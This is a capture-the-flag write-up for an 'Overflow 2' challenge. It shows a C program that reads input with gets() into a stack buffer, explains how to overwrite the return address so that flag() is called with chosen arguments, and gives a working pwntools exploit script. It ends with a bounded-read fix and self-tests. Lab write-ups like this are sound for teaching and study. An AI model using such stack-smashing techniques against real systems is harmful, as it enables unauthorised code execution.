Overflow 2
Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_0_f4d7b52433d7aa96e72a63fdd5dcc9cc on the shell server. Source.
GDB can print the stack after you send arguments
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 176
#define FLAGSIZE 64

void flag(unsigned int arg1, unsigned int arg2) {
    char buf[FLAGSIZE];
    FILE *f = fopen("flag.txt","r");
    if (f == NULL) {
        printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
        exit(0);
    }
    fgets(buf,FLAGSIZE,f);
    if (arg1 != 0xDEADBEEF)
        return;
    if (arg2 != 0xC0DED00D)
        return;
    printf(buf);
}

void vuln(){
    char buf[BUFSIZE];
    gets(buf);
    puts(buf);
}

int main(int argc, char **argv){
    setvbuf(stdout, NULL, _IONBF, 0);
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    puts("Please enter your string: ");
    vuln();
    return 0;
}
```
You can see the flag() function in the source code. It prints the flag only if arg1 == 0xDEADBEEF and arg2 == 0xC0DED00D, so our target is to call flag() with those two parameters.

In vuln(), gets() reads our input without any bounds check, so we can simply overwrite the return address of vuln() and point it at the address of flag():

```
payload = 'a'*offset + flag_add
```
On a 32-bit system, when a function is called from main, its parameters are pushed on the stack at ebp-8, ebp-0xc, ... (debug it to see this clearly).

So, to call flag() with two parameters, the payload must be:

```
payload = 'a'*offset + flag_add + [4 bytes return address] + [4 bytes arg1] + [4 bytes arg2]
```
```python
from pwn import *

s = process('./vuln')
input('debug')              # pause here to attach gdb before sending the payload

flag = 0x80485e6            # address of flag()
main = 0x80486b5            # used as the fake return address for flag()

payload  = b'a' * 0xbc      # fill buf and the saved ebp up to the return address
payload += p32(flag)        # overwritten return address of vuln() -> flag()
payload += p32(main)        # return address that flag() will see
payload += p32(0xDEADBEEF)  # arg1
payload += p32(0xC0DED00D)  # arg2

s.sendline(payload)
s.interactive()
```
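For contrast, here is what the fix looks like on the defending side: an added example (not part of the original writeup or the challenge source) that replaces gets() in vuln() with a bounded line reader and checks, using a constructed 300-byte input, that an over-long line is truncated to BUFSIZE-1 and its excess drained rather than written past the buffer. The read_line, vuln_fixed and demo_* names are my own; fmemopen() is only used to feed the constructed input.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen() for the self-test below */
#include <stdio.h>
#include <string.h>
#define BUFSIZE 176

/* Bounded gets() replacement: read one line into buf (capacity n), strip the
 * newline, drain any excess so the next read starts on a fresh line.
 * Returns bytes stored, or -1 on EOF/error with nothing read. */
int read_line(char *buf, size_t n, FILE *in) {
    if (fgets(buf, (int)n, in) == NULL)
        return -1;                        /* EOF or error: nothing stored */
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';                /* whole line fit: drop the newline */
    } else {
        int c;                            /* line exceeded n-1 bytes: drain it */
        while ((c = fgetc(in)) != EOF && c != '\n') { }
    }
    return (int)len;
}

/* Hardened vuln(): same output for short input, but a long line can no
 * longer run past buf into the saved ebp and return address. */
void vuln_fixed(FILE *in) {
    char buf[BUFSIZE];
    if (read_line(buf, sizeof buf, in) >= 0)
        puts(buf);
}

/* Constructed self-test input: a 300-byte line (which gets() would let
 * overflow the 176-byte buffer) followed by a short second line. */
static FILE *constructed_input(void) {
    static char data[308];
    memset(data, 'A', 300);
    memcpy(data + 300, "\nhello\n", 8);   /* 7 chars plus terminating NUL */
    return fmemopen(data, strlen(data), "r");
}

int demo_first_line_len(void) {           /* 175: truncated to BUFSIZE-1 */
    char buf[BUFSIZE];
    FILE *in = constructed_input();
    int len = read_line(buf, sizeof buf, in);
    fclose(in);
    return len;
}

int demo_second_line_len(void) {          /* 5: the excess was drained */
    char buf[BUFSIZE];
    FILE *in = constructed_input();
    read_line(buf, sizeof buf, in);
    int len = read_line(buf, sizeof buf, in);
    fclose(in);
    return len;
}
```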